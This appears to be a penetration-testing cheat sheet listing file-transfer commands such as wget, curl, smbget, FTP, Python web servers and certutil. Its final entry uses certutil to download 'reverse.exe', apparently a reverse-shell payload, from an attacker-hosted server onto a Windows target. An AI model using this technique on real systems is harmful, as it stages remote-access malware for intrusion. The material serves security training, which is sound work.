Upload/Download


            

Wget

Wget is a command line utility for retrieving files from the web

Usage:

wget http://192.168.0.1/file.txt

            

Smbget

Smbget is a command line utility for retrieving files from the network

Usage:

smbget smb://192.168.0.1/$share/file.txt

            

Git clone

Git clone is a command line utility for cloning repositories

Usage:

git clone https://github.com/username/repository

            

Python Web Server

Python Web Server is a command line utility for creating a web server on your local machine or target machine. This http server can then be accessed through utilities like wget to get files from one machine to another

Usage:

python -m SimpleHTTPServer PORT - Python2/Python3

python3 -m http.server PORT - Python3 (Shows GET/POST requests)


            

Curl

Curl is a command line utility for retrieving files from the web

Usage:

curl http://192.168.0.1/file.txt > download.txt

            

FTP

Usage:

Upload file to FTP server: put file.txt

Download file from FTP server: get file.txt


            

Certutil

Certutil is a command line utility for creating and managing certificates, but can also be used to transfer files to a Windows machine in our case

Usage:

certutil -urlcache -f http://192.168.0.1:8000/reverse.exe reverse.exe